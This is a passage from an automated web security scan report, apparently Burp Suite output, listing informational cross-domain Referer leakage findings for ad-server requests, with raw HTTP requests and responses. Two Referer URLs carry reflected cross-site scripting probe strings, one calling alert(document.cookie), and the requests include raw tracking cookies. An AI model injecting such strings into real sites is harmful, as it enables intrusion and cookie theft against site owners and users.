Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adj/onl.vine/music/blogs

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=3;sz=940x1;ord=100511120035? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 262

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b02/0/0/%2a/w;44306;0-0;0;51300835;22475-940/1;0/0/0;;~aopt=2/1/4/2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=;sz=728x90;ord=b1615b20a4? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 38714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
2908128%3B3454-728/90%3B41654583/41672370/1%3B%3B%7Esscs%3D%3fhttp://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=http://">
<IMG SRC="http://s0.2mdn.net/1577870/PID_1588095_FP_S11_LEADERBOARD_728x90.gif" width="728" height="90" BORDER="0" alt="">
</A>
...[SNIP]...

15.3. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784.2;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=;sz=300x250;ord=3d088ae512? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38825
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:08:48 GMT
Expires: Mon, 09 May 2011 14:08:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
908130%3B4307-300/250%3B41654573/41672360/1%3B%3B%7Esscs%3D%3fhttp://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=856__zoneid=2__cb=3d088ae512__oadest=http://">
<IMG SRC="http://s0.2mdn.net/1577870/PID_1588089_FP_S11_MPU_300x250.gif" width="300" height="250" BORDER="0" alt="">
</A>
...[SNIP]...

15.4. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/d%3B236799042%3B1-0%3B0%3B60352415%3B3454-728/90%3B40792835/40810622/2%3B%3B%7Esscs%3D%3fhttp://www.chicago.buyatoyota.com/MaySales"><img src="http://s0.2mdn.net/3029224/11SE_MRSE_GENERIC_UNDER40K_BACKUP_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
</script>
<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>

15.5. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri May 06 13:07:08 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ap.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe"><img src="http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://cdn.doubleverify.com/script152.js?agnc=563308&cmp=5229711&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=63617239&advid=998766&sid=327761&adid="></script>
...[SNIP]...

15.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/mnum=0000884214/cstr=29047542=_4dc7f368,4264037248,743832%5E884214%5E81%5E0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=;ord=4264037248? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 553
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:10 GMT
Expires: Mon, 09 May 2011 14:00:10 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/c/b2/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click
...[SNIP]...
dc7f368,4264037248,743832%5E884214%5E81%5E0,1_/xsxdata=$xsxdata/bnum=29047542/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

15.7. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn~~!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44~~!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<
xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr~~!#h.N!!!!#<yMiw!#k]4~~!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w~~!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI~~!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; 
BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0313.rm.bf1
Set-Cookie: ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypnC!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: vuday1=qtDL:!1e0g7s@DV; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypnC=!oT]~"; path=/; expires=Wed, 08-May-2013 14:00:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
